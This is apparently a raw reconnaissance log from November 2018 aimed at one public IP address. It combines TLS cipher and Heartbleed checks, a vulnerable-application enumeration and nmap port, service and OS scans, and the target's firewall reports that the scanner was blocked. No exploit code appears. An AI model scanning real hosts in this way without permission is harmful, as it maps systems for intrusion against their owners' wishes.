 --------------------------------------------------

Unhandled exception when processing --reneg:
_nassl.OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

Unhandled exception when processing --compression:
_nassl.OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

  * Session Resumption:
      With Session IDs:                  ERROR (0 successful, 0 failed, 5 errors, 5 total attempts).
        ERROR #1: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
        ERROR #2: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
        ERROR #3: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
        ERROR #4: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
        ERROR #5: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol
      With TLS Session Tickets:          ERROR: OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

Unhandled exception when processing --certinfo:
_nassl.OpenSSLError -
error:140770FC:SSL routines:SSL23_GET_SERVER_HELLO:unknown protocol

  * SSLV2 Cipher Suites:
      Undefined - An unexpected error happened:
                 RC4-MD5                             timeout - timed out
                 RC2-CBC-MD5                         timeout - timed out
                 IDEA-CBC-MD5                        timeout - timed out
                 EXP-RC4-MD5                         timeout - timed out
                 EXP-RC2-CBC-MD5                     timeout - timed out
                 DES-CBC3-MD5                        timeout - timed out
                 DES-CBC-MD5                         timeout - timed out

  * SSLV3 Cipher Suites:
      Undefined - An unexpected error happened:
                 SEED-SHA                            timeout - timed out
                 RC4-MD5                             timeout - timed out
                 NULL-SHA                            timeout - timed out
                 IDEA-CBC-SHA                        timeout - timed out
                 EXP-RC4-MD5                         timeout - timed out
                 EXP-EDH-RSA-DES-CBC-SHA             timeout - timed out
                 EXP-EDH-DSS-DES-CBC-SHA             timeout - timed out
                 EXP-DES-CBC-SHA                     timeout - timed out
                 EXP-ADH-RC4-MD5                     timeout - timed out
                 EXP-ADH-DES-CBC-SHA                 timeout - timed out
                 EDH-RSA-DES-CBC3-SHA                timeout - timed out
                 EDH-RSA-DES-CBC-SHA                 timeout - timed out
                 EDH-DSS-DES-CBC3-SHA                timeout - timed out
                 EDH-DSS-DES-CBC-SHA                 timeout - timed out
                 ECDHE-RSA-RC4-SHA                   timeout - timed out
                 ECDHE-RSA-NULL-SHA                  timeout - timed out
                 ECDHE-RSA-DES-CBC3-SHA              timeout - timed out
                 ECDHE-RSA-AES256-SHA                timeout - timed out
                 ECDHE-RSA-AES128-SHA                timeout - timed out
                 ECDHE-ECDSA-RC4-SHA                 timeout - timed out
                 ECDHE-ECDSA-NULL-SHA                timeout - timed out
                 ECDHE-ECDSA-DES-CBC3-SHA            timeout - timed out
                 ECDHE-ECDSA-AES128-SHA              timeout - timed out
                 ECDH-RSA-RC4-SHA                    timeout - timed out
                 ECDH-RSA-NULL-SHA                   timeout - timed out
                 ECDH-RSA-DES-CBC3-SHA               timeout - timed out
                 ECDH-RSA-AES256-SHA                 timeout - timed out
                 ECDH-RSA-AES128-SHA                 timeout - timed out
                 ECDH-ECDSA-RC4-SHA                  timeout - timed out
                 ECDH-ECDSA-AES256-SHA               timeout - timed out
                 ECDH-ECDSA-AES128-SHA               timeout - timed out
                 DHE-RSA-SEED-SHA                    timeout - timed out
                 DHE-RSA-CAMELLIA256-SHA             timeout - timed out
                 DHE-RSA-CAMELLIA128-SHA             timeout - timed out
                 DHE-RSA-AES128-SHA                  timeout - timed out
                 DHE-DSS-SEED-SHA                    timeout - timed out
                 DHE-DSS-CAMELLIA256-SHA             timeout - timed out
                 DHE-DSS-AES128-SHA                  timeout - timed out
                 DH-RSA-SEED-SHA                     timeout - timed out
                 DH-RSA-DES-CBC3-SHA                 timeout - timed out
                 DH-RSA-DES-CBC-SHA                  timeout - timed out
                 DH-RSA-CAMELLIA256-SHA              timeout - timed out
                 DH-DSS-DES-CBC3-SHA                 timeout - timed out
                 DH-DSS-DES-CBC-SHA                  timeout - timed out
                 DH-DSS-CAMELLIA128-SHA              timeout - timed out
                 DH-DSS-AES256-SHA                   timeout - timed out
                 DH-DSS-AES128-SHA                   timeout - timed out
                 DES-CBC-SHA                         timeout - timed out
                 CAMELLIA128-SHA                     timeout - timed out
                 AES256-SHA                          timeout - timed out
                 AECDH-RC4-SHA                       timeout - timed out
                 AECDH-NULL-SHA                      timeout - timed out
                 AECDH-DES-CBC3-SHA                  timeout - timed out
                 AECDH-AES256-SHA                    timeout - timed out
                 AECDH-AES128-SHA                    timeout - timed out
                 ADH-SEED-SHA                        timeout - timed out
                 ADH-RC4-MD5                         timeout - timed out
                 ADH-DES-CBC3-SHA                    timeout - timed out
                 ADH-DES-CBC-SHA                     timeout - timed out
                 ADH-CAMELLIA256-SHA                 timeout - timed out
                 ADH-CAMELLIA128-SHA                 timeout - timed out
                 ADH-AES128-SHA                      timeout - timed out


 SCAN COMPLETED IN 123.54 S
 --------------------------
Version: 1.11.12-static
OpenSSL 1.0.2-chacha (1.0.2g-dev)

Connected to 85.17.16.76

Testing SSL server 85.17.16.76 on port 443 using SNI name 85.17.16.76

  TLS Fallback SCSV:
Server does not support TLS Fallback SCSV

  TLS renegotiation:
Session renegotiation not supported

  TLS Compression:
Compression disabled

  Heartbleed:
TLS 1.2 not vulnerable to heartbleed
TLS 1.1 not vulnerable to heartbleed
TLS 1.0 not vulnerable to heartbleed

  Supported Server Cipher(s):

#######################################################################################################################################

I, [2018-11-19T04:04:46.700182 #14634]  INFO -- : Initiating port scan
I, [2018-11-19T04:06:53.451359 #14634]  INFO -- : Using nmap scan output file logs/nmap_output_2018-11-19_04-04-46.xml
I, [2018-11-19T04:06:53.452574 #14634]  INFO -- : Discovered open port: 85.17.16.76:80
I, [2018-11-19T04:06:54.056245 #14634]  INFO -- : Discovered open port: 85.17.16.76:443
I, [2018-11-19T04:06:54.605989 #14634]  INFO -- : <<<Enumerating vulnerable applications>>>


--------------------------------------------------------
<<<Yasuo discovered following vulnerable applications>>>
--------------------------------------------------------
+----------+--------------------+-------------------+----------+----------+
| App Name | URL to Application | Potential Exploit | Username | Password |
+----------+--------------------+-------------------+----------+----------+
+----------+--------------------+-------------------+----------+----------+
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:07 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:07
Completed NSE at 04:07, 0.00s elapsed
Initiating NSE at 04:07
Completed NSE at 04:07, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:07
Completed Parallel DNS resolution of 1 host. at 04:07, 16.50s elapsed
Initiating SYN Stealth Scan at 04:07
Scanning 85.17.16.76 [474 ports]
Discovered open port 8888/tcp on 85.17.16.76
Discovered open port 22/tcp on 85.17.16.76
Discovered open port 21/tcp on 85.17.16.76
Discovered open port 80/tcp on 85.17.16.76
Discovered open port 443/tcp on 85.17.16.76
Discovered open port 8890/tcp on 85.17.16.76
Completed SYN Stealth Scan at 04:07, 5.14s elapsed (474 total ports)
Initiating Service scan at 04:08
Scanning 6 services on 85.17.16.76
Service scan Timing: About 50.00% done; ETC: 04:09 (0:00:33 remaining)
Service scan Timing: About 66.67% done; ETC: 04:10 (0:00:47 remaining)
Completed Service scan at 04:09, 99.01s elapsed (6 services on 1 host)
Initiating OS detection (try #1) against 85.17.16.76
Retrying OS detection (try #2) against 85.17.16.76
Initiating Traceroute at 04:09
Completed Traceroute at 04:09, 0.13s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 04:09
Completed Parallel DNS resolution of 2 hosts. at 04:10, 16.50s elapsed
NSE: Script scanning 85.17.16.76.
Initiating NSE at 04:10
Completed NSE at 04:11, 90.29s elapsed
Initiating NSE at 04:11
Completed NSE at 04:11, 1.21s elapsed
Nmap scan report for 85.17.16.76
Host is up (0.12s latency).
Not shown: 465 filtered ports
PORT     STATE  SERVICE         VERSION
21/tcp   open   ftp?
| fingerprint-strings:
|   GenericLines, GetRequest, Help, NULL:
|     Your connection to this server has been blocked in this network firewall.
|     need to contact the network admin at [security@dimofinf.net] for further information.
|     Your blocked IP address is 194.187.249.229.
|     This server's hostname is unlimited6.dimofinf.net.
|     more information visit: https://www.dimofinf.net/knowledgebase.php?action=displayarticle&id=446
|_    Dimofinf Technologies Inc.
|_ftp-bounce: ERROR: Script execution failed (use -d to debug)
22/tcp   open   ssh?
| fingerprint-strings:
|   GenericLines, GetRequest, HTTPOptions, NULL:
|     Your connection to this server has been blocked in this network firewall.
|     need to contact the network admin at [security@dimofinf.net] for further information.
|     Your blocked IP address is 194.187.249.229.
|     This server's hostname is unlimited6.dimofinf.net.
|     more information visit: https://www.dimofinf.net/knowledgebase.php?action=displayarticle&id=446
|_    Dimofinf Technologies Inc.
25/tcp   closed smtp
80/tcp   open   http-proxy      Squid http proxy
| http-methods:
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-open-proxy: Proxy might be redirecting requests
|_http-title: Site doesn't have a title (text/html).
139/tcp  closed netbios-ssn
443/tcp  open   https
| fingerprint-strings:
|   SSLSessionReq, TLSSessionReq:
|     HTTP/1.1 403 OK
|     Content-type: text/html
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>Unauthorized Access - Dimofinf Technologies Inc</title>
|     <style type="text/css">body{background:#FAFAFA;color:#666666;}.container {color:#666666;margin:auto;width:950px;padding: 0 5px 5px 5px;}td{font-family:Tahoma, Lucida Grande, sans-serif;font-size:8pt;text-shadow: 1px 1px 0 #FFFFFF;}.line{background-image:url('http://www.dimofinf.net/images/firewall/line.png');background-repeat: no-repeat;background-position: left;} hr{background-color:#E7E7E7;border:0;border-top:1px solid #E7E7E7;height:0;margin:10px 0 10px 0;overflow:hidden;}ul {list-style: square;color: #0096D6;}li {font-size: 8pt; }li span {color: #666666;}</style>
|     </head>
|     <body>
|     <center>
|_    <div class="container"><span style="float:left;"><a target="_blank" href="https://www.dimofinf.n
|_http-title: Unauthorized Access - Dimofinf Technologies Inc
445/tcp  closed microsoft-ds
8888/tcp open   sun-answerbook?
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 403 OK
|     Content-type: text/html
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>Unauthorized Access - Dimofinf Technologies Inc</title>
|     <style type="text/css">body{background:#FAFAFA;color:#666666;}.container {color:#666666;margin:auto;width:950px;padding: 0 5px 5px 5px;}td{font-family:Tahoma, Lucida Grande, sans-serif;font-size:8pt;text-shadow: 1px 1px 0 #FFFFFF;}.line{background-image:url('http://www.dimofinf.net/images/firewall/line.png');background-repeat: no-repeat;background-position: left;} hr{background-color:#E7E7E7;border:0;border-top:1px solid #E7E7E7;height:0;margin:10px 0 10px 0;overflow:hidden;}ul {list-style: square;color: #0096D6;}li {font-size: 8pt; }li span {color: #666666;}</style>
|     </head>
|     <body>
|     <center>
|_    <div class="container"><span style="float:left;"><a target="_blank" href="https://www.dimofinf.n
8890/tcp open   ddi-tcp-3?
| fingerprint-strings:
|   GenericLines, GetRequest:
|     HTTP/1.1 403 OK
|     Content-type: text/html
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
|     <title>Unauthorized Access - Dimofinf Technologies Inc</title>
|     <style type="text/css">body{background:#FAFAFA;color:#666666;}.container {color:#666666;margin:auto;width:950px;padding: 0 5px 5px 5px;}td{font-family:Tahoma, Lucida Grande, sans-serif;font-size:8pt;text-shadow: 1px 1px 0 #FFFFFF;}.line{background-image:url('http://www.dimofinf.net/images/firewall/line.png');background-repeat: no-repeat;background-position: left;} hr{background-color:#E7E7E7;border:0;border-top:1px solid #E7E7E7;height:0;margin:10px 0 10px 0;overflow:hidden;}ul {list-style: square;color: #0096D6;}li {font-size: 8pt; }li span {color: #666666;}</style>
|     </head>
|     <body>
|     <center>
|_    <div class="container"><span style="float:left;"><a target="_blank" href="https://www.dimofinf.n
5 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port21-TCP:V=7.70%I=7%D=11/19%Time=5BF27D70%P=x86_64-pc-linux-gnu%r(NUL
SF:L,18A,"Your\x20connection\x20to\x20this\x20server\x20has\x20been\x20blo
SF:cked\x20in\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20con
SF:tact\x20the\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20
SF:for\x20further\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20
SF:is\x20194\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unl
SF:imited6\.dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20htt
SF:ps://www\.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=44
SF:6\r\n\r\nDimofinf\x20Technologies\x20Inc\.\r\n")%r(GenericLines,18A,"Yo
SF:ur\x20connection\x20to\x20this\x20server\x20has\x20been\x20blocked\x20i
SF:n\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20t
SF:he\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20fu
SF:rther\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194
SF:\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.
SF:dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20https://www\
SF:.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=446\r\n\r\n
SF:Dimofinf\x20Technologies\x20Inc\.\r\n")%r(Help,18A,"Your\x20connection\
SF:x20to\x20this\x20server\x20has\x20been\x20blocked\x20in\x20this\x20netw
SF:ork\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20
SF:admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20further\x20informat
SF:ion\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.
SF:\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r
SF:\nFor\x20more\x20information\x20visit:\x20https://www\.dimofinf\.net/kn
SF:owledgebase\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Techn
SF:ologies\x20Inc\.\r\n")%r(GetRequest,18A,"Your\x20connection\x20to\x20th
SF:is\x20server\x20has\x20been\x20blocked\x20in\x20this\x20network\x20fire
SF:wall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20admin\x20at
SF:\x20\[security@dimofinf\.net\]\x20for\x20further\x20information\.\r\nYo
SF:ur\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.\r\nThis\x2
SF:0server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r\nFor\x20mo
SF:re\x20information\x20visit:\x20https://www\.dimofinf\.net/knowledgebase
SF:\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Technologies\x20
SF:Inc\.\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port22-TCP:V=7.70%I=7%D=11/19%Time=5BF27D70%P=x86_64-pc-linux-gnu%r(NUL
SF:L,18A,"Your\x20connection\x20to\x20this\x20server\x20has\x20been\x20blo
SF:cked\x20in\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20con
SF:tact\x20the\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20
SF:for\x20further\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20
SF:is\x20194\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unl
SF:imited6\.dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20htt
SF:ps://www\.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=44
SF:6\r\n\r\nDimofinf\x20Technologies\x20Inc\.\r\n")%r(GenericLines,18A,"Yo
SF:ur\x20connection\x20to\x20this\x20server\x20has\x20been\x20blocked\x20i
SF:n\x20this\x20network\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20t
SF:he\x20network\x20admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20fu
SF:rther\x20information\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194
SF:\.187\.249\.229\.\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.
SF:dimofinf\.net\.\r\nFor\x20more\x20information\x20visit:\x20https://www\
SF:.dimofinf\.net/knowledgebase\.php\?action=displayarticle&id=446\r\n\r\n
SF:Dimofinf\x20Technologies\x20Inc\.\r\n")%r(GetRequest,18A,"Your\x20conne
SF:ction\x20to\x20this\x20server\x20has\x20been\x20blocked\x20in\x20this\x
SF:20network\x20firewall\.\r\nYou\x20need\x20to\x20contact\x20the\x20netwo
SF:rk\x20admin\x20at\x20\[security@dimofinf\.net\]\x20for\x20further\x20in
SF:formation\.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\
SF:.229\.\r\nThis\x20server's\x20hostname\x20is\x20unlimited6\.dimofinf\.n
SF:et\.\r\nFor\x20more\x20information\x20visit:\x20https://www\.dimofinf\.
SF:net/knowledgebase\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x2
SF:0Technologies\x20Inc\.\r\n")%r(HTTPOptions,18A,"Your\x20connection\x20t
SF:o\x20this\x20server\x20has\x20been\x20blocked\x20in\x20this\x20network\
SF:x20firewall\.\r\nYou\x20need\x20to\x20contact\x20the\x20network\x20admi
SF:n\x20at\x20\[security@dimofinf\.net\]\x20for\x20further\x20information\
SF:.\r\nYour\x20blocked\x20IP\x20address\x20is\x20194\.187\.249\.229\.\r\n
SF:This\x20server's\x20hostname\x20is\x20unlimited6\.dimofinf\.net\.\r\nFo
SF:r\x20more\x20information\x20visit:\x20https://www\.dimofinf\.net/knowle
SF:dgebase\.php\?action=displayarticle&id=446\r\n\r\nDimofinf\x20Technolog
SF:ies\x20Inc\.\r\n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port443-TCP:V=7.70%I=7%D=11/19%Time=5BF27D75%P=x86_64-pc-linux-gnu%r(SS
SF:LSessionReq,F19,"HTTP/1\.1\x20403\x20OK\r\nContent-type:\x20text/html\r
SF:\n\r\n<html>\r\r\n<head>\r\r\n<meta\x20http-equiv=\"Content-Type\"\x20c
SF:ontent=\"text/html;\x20charset=UTF-8\">\r\r\n<title>Unauthorized\x20Acc
SF:ess\x20-\x20Dimofinf\x20Technologies\x20Inc</title>\r\r\n<style\x20type
SF:=\"text/css\">body{background:#FAFAFA;color:#666666;}\.container\x20{co
SF:lor:#666666;margin:auto;width:950px;padding:\x200\x205px\x205px\x205px;
SF:}td{font-family:Tahoma,\x20Lucida\x20Grande,\x20sans-serif;font-size:8p
SF:t;text-shadow:\x201px\x201px\x200\x20#FFFFFF;}\.line{background-image:u
SF:rl\('http://www\.dimofinf\.net/images/firewall/line\.png'\);background-
SF:repeat:\x20no-repeat;background-position:\x20left;}\thr{background-colo
SF:r:#E7E7E7;border:0;border-top:1px\x20solid\x20#E7E7E7;height:0;margin:1
SF:0px\x200\x2010px\x200;overflow:hidden;}ul\x20{list-style:\x20square;col
SF:or:\x20#0096D6;}li\x20{font-size:\x208pt;\x20}li\x20span\x20{color:\x20
SF:#666666;}</style>\r\r\n</head>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x2
SF:0class=\"container\"><span\x20style=\"float:left;\"><a\x20target=\"_bla
SF:nk\"\x20href=\"https://www\.dimofinf\.n")%r(TLSSessionReq,F19,"HTTP/1\.
SF:1\x20403\x20OK\r\nContent-type:\x20text/html\r\n\r\n<html>\r\r\n<head>\
SF:r\r\n<meta\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20ch
SF:arset=UTF-8\">\r\r\n<title>Unauthorized\x20Access\x20-\x20Dimofinf\x20T
SF:echnologies\x20Inc</title>\r\r\n<style\x20type=\"text/css\">body{backgr
SF:ound:#FAFAFA;color:#666666;}\.container\x20{color:#666666;margin:auto;w
SF:idth:950px;padding:\x200\x205px\x205px\x205px;}td{font-family:Tahoma,\x
SF:20Lucida\x20Grande,\x20sans-serif;font-size:8pt;text-shadow:\x201px\x20
SF:1px\x200\x20#FFFFFF;}\.line{background-image:url\('http://www\.dimofinf
SF:\.net/images/firewall/line\.png'\);background-repeat:\x20no-repeat;back
SF:ground-position:\x20left;}\thr{background-color:#E7E7E7;border:0;border
SF:-top:1px\x20solid\x20#E7E7E7;height:0;margin:10px\x200\x2010px\x200;ove
SF:rflow:hidden;}ul\x20{list-style:\x20square;color:\x20#0096D6;}li\x20{fo
SF:nt-size:\x208pt;\x20}li\x20span\x20{color:\x20#666666;}</style>\r\r\n</
SF:head>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x20class=\"container\"><spa
SF:n\x20style=\"float:left;\"><a\x20target=\"_blank\"\x20href=\"https://ww
SF:w\.dimofinf\.n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8888-TCP:V=7.70%I=7%D=11/19%Time=5BF27D75%P=x86_64-pc-linux-gnu%r(G
SF:etRequest,F19,"HTTP/1\.1\x20403\x20OK\r\nContent-type:\x20text/html\r\n
SF:\r\n<html>\r\r\n<head>\r\r\n<meta\x20http-equiv=\"Content-Type\"\x20con
SF:tent=\"text/html;\x20charset=UTF-8\">\r\r\n<title>Unauthorized\x20Acces
SF:s\x20-\x20Dimofinf\x20Technologies\x20Inc</title>\r\r\n<style\x20type=\
SF:"text/css\">body{background:#FAFAFA;color:#666666;}\.container\x20{colo
SF:r:#666666;margin:auto;width:950px;padding:\x200\x205px\x205px\x205px;}t
SF:d{font-family:Tahoma,\x20Lucida\x20Grande,\x20sans-serif;font-size:8pt;
SF:text-shadow:\x201px\x201px\x200\x20#FFFFFF;}\.line{background-image:url
SF:\('http://www\.dimofinf\.net/images/firewall/line\.png'\);background-re
SF:peat:\x20no-repeat;background-position:\x20left;}\thr{background-color:
SF:#E7E7E7;border:0;border-top:1px\x20solid\x20#E7E7E7;height:0;margin:10p
SF:x\x200\x2010px\x200;overflow:hidden;}ul\x20{list-style:\x20square;color
SF::\x20#0096D6;}li\x20{font-size:\x208pt;\x20}li\x20span\x20{color:\x20#6
SF:66666;}</style>\r\r\n</head>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x20c
SF:lass=\"container\"><span\x20style=\"float:left;\"><a\x20target=\"_blank
SF:\"\x20href=\"https://www\.dimofinf\.n")%r(HTTPOptions,F19,"HTTP/1\.1\x2
SF:0403\x20OK\r\nContent-type:\x20text/html\r\n\r\n<html>\r\r\n<head>\r\r\
SF:n<meta\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20charse
SF:t=UTF-8\">\r\r\n<title>Unauthorized\x20Access\x20-\x20Dimofinf\x20Techn
SF:ologies\x20Inc</title>\r\r\n<style\x20type=\"text/css\">body{background
SF::#FAFAFA;color:#666666;}\.container\x20{color:#666666;margin:auto;width
SF::950px;padding:\x200\x205px\x205px\x205px;}td{font-family:Tahoma,\x20Lu
SF:cida\x20Grande,\x20sans-serif;font-size:8pt;text-shadow:\x201px\x201px\
SF:x200\x20#FFFFFF;}\.line{background-image:url\('http://www\.dimofinf\.ne
SF:t/images/firewall/line\.png'\);background-repeat:\x20no-repeat;backgrou
SF:nd-position:\x20left;}\thr{background-color:#E7E7E7;border:0;border-top
SF::1px\x20solid\x20#E7E7E7;height:0;margin:10px\x200\x2010px\x200;overflo
SF:w:hidden;}ul\x20{list-style:\x20square;color:\x20#0096D6;}li\x20{font-s
SF:ize:\x208pt;\x20}li\x20span\x20{color:\x20#666666;}</style>\r\r\n</head
SF:>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x20class=\"container\"><span\x2
SF:0style=\"float:left;\"><a\x20target=\"_blank\"\x20href=\"https://www\.d
SF:imofinf\.n");
==============NEXT SERVICE FINGERPRINT (SUBMIT INDIVIDUALLY)==============
SF-Port8890-TCP:V=7.70%I=7%D=11/19%Time=5BF27D7A%P=x86_64-pc-linux-gnu%r(G
SF:enericLines,F19,"HTTP/1\.1\x20403\x20OK\r\nContent-type:\x20text/html\r
SF:\n\r\n<html>\r\r\n<head>\r\r\n<meta\x20http-equiv=\"Content-Type\"\x20c
SF:ontent=\"text/html;\x20charset=UTF-8\">\r\r\n<title>Unauthorized\x20Acc
SF:ess\x20-\x20Dimofinf\x20Technologies\x20Inc</title>\r\r\n<style\x20type
SF:=\"text/css\">body{background:#FAFAFA;color:#666666;}\.container\x20{co
SF:lor:#666666;margin:auto;width:950px;padding:\x200\x205px\x205px\x205px;
SF:}td{font-family:Tahoma,\x20Lucida\x20Grande,\x20sans-serif;font-size:8p
SF:t;text-shadow:\x201px\x201px\x200\x20#FFFFFF;}\.line{background-image:u
SF:rl\('http://www\.dimofinf\.net/images/firewall/line\.png'\);background-
SF:repeat:\x20no-repeat;background-position:\x20left;}\thr{background-colo
SF:r:#E7E7E7;border:0;border-top:1px\x20solid\x20#E7E7E7;height:0;margin:1
SF:0px\x200\x2010px\x200;overflow:hidden;}ul\x20{list-style:\x20square;col
SF:or:\x20#0096D6;}li\x20{font-size:\x208pt;\x20}li\x20span\x20{color:\x20
SF:#666666;}</style>\r\r\n</head>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x2
SF:0class=\"container\"><span\x20style=\"float:left;\"><a\x20target=\"_bla
SF:nk\"\x20href=\"https://www\.dimofinf\.n")%r(GetRequest,F19,"HTTP/1\.1\x
SF:20403\x20OK\r\nContent-type:\x20text/html\r\n\r\n<html>\r\r\n<head>\r\r
SF:\n<meta\x20http-equiv=\"Content-Type\"\x20content=\"text/html;\x20chars
SF:et=UTF-8\">\r\r\n<title>Unauthorized\x20Access\x20-\x20Dimofinf\x20Tech
SF:nologies\x20Inc</title>\r\r\n<style\x20type=\"text/css\">body{backgroun
SF:d:#FAFAFA;color:#666666;}\.container\x20{color:#666666;margin:auto;widt
SF:h:950px;padding:\x200\x205px\x205px\x205px;}td{font-family:Tahoma,\x20L
SF:ucida\x20Grande,\x20sans-serif;font-size:8pt;text-shadow:\x201px\x201px
SF:\x200\x20#FFFFFF;}\.line{background-image:url\('http://www\.dimofinf\.n
SF:et/images/firewall/line\.png'\);background-repeat:\x20no-repeat;backgro
SF:und-position:\x20left;}\thr{background-color:#E7E7E7;border:0;border-to
SF:p:1px\x20solid\x20#E7E7E7;height:0;margin:10px\x200\x2010px\x200;overfl
SF:ow:hidden;}ul\x20{list-style:\x20square;color:\x20#0096D6;}li\x20{font-
SF:size:\x208pt;\x20}li\x20span\x20{color:\x20#666666;}</style>\r\r\n</hea
SF:d>\r\r\n<body>\r\r\n<center>\t\r\r\n<div\x20class=\"container\"><span\x
SF:20style=\"float:left;\"><a\x20target=\"_blank\"\x20href=\"https://www\.
SF:dimofinf\.n");
Aggressive OS guesses: Linux 3.10 - 4.11 (91%), HP P2000 G3 NAS device (90%), Linux 3.2 - 4.9 (90%), Linux 4.4 (89%), Linux 2.6.32 (89%), Linux 2.6.32 - 3.1 (89%), Ubiquiti Pico Station WAP (AirOS 5.2.6) (89%), Linux 3.18 (88%), Linux 2.6.32 - 3.13 (88%), Linux 3.0 - 3.2 (88%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 8.866 days (since Sat Nov 10 07:23:56 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: All zeros

TRACEROUTE (using port 25/tcp)
HOP RTT       ADDRESS
1   121.45 ms 10.251.200.1
2   121.44 ms 85.17.16.76

NSE: Script Post-scanning.
Initiating NSE at 04:11
Completed NSE at 04:11, 0.00s elapsed
Initiating NSE at 04:11
Completed NSE at 04:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 233.83 seconds
           Raw packets sent: 1023 (49.916KB) | Rcvd: 863 (403.816KB)
#######################################################################################################################################
Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-19 04:11 EST
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 04:11
Completed NSE at 04:11, 0.00s elapsed
Initiating NSE at 04:11
Completed NSE at 04:11, 0.00s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:11
Completed Parallel DNS resolution of 1 host. at 04:11, 16.50s elapsed
Initiating UDP Scan at 04:11
Scanning 85.17.16.76 [14 ports]
Completed UDP Scan at 04:11, 2.13s elapsed (14 total ports)
Initiating Service scan at 04:11
Scanning 12 services on 85.17.16.76
Service scan Timing: About 8.33% done; ETC: 04:31 (0:17:58 remaining)
Completed Service scan at 04:13, 102.58s elapsed (12 services on 1 host)
Initiating OS detection (try #1) against 85.17.16.76
Retrying OS detection (try #2) against 85.17.16.76
Initiating Traceroute at 04:13
Completed Traceroute at 04:13, 7.20s elapsed
Initiating Parallel DNS resolution of 1 host. at 04:13
Completed Parallel DNS resolution of 1 host. at 04:14, 16.50s elapsed
NSE: Script scanning 85.17.16.76.
Initiating NSE at 04:14
Completed NSE at 04:14, 20.36s elapsed
Initiating NSE at 04:14
Completed NSE at 04:14, 1.03s elapsed
Nmap scan report for 85.17.16.76
Host is up (0.12s latency).

PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
69/udp   open|filtered tftp
88/udp   open|filtered kerberos-sec
123/udp  open|filtered ntp
137/udp  filtered      netbios-ns
138/udp  filtered      netbios-dgm
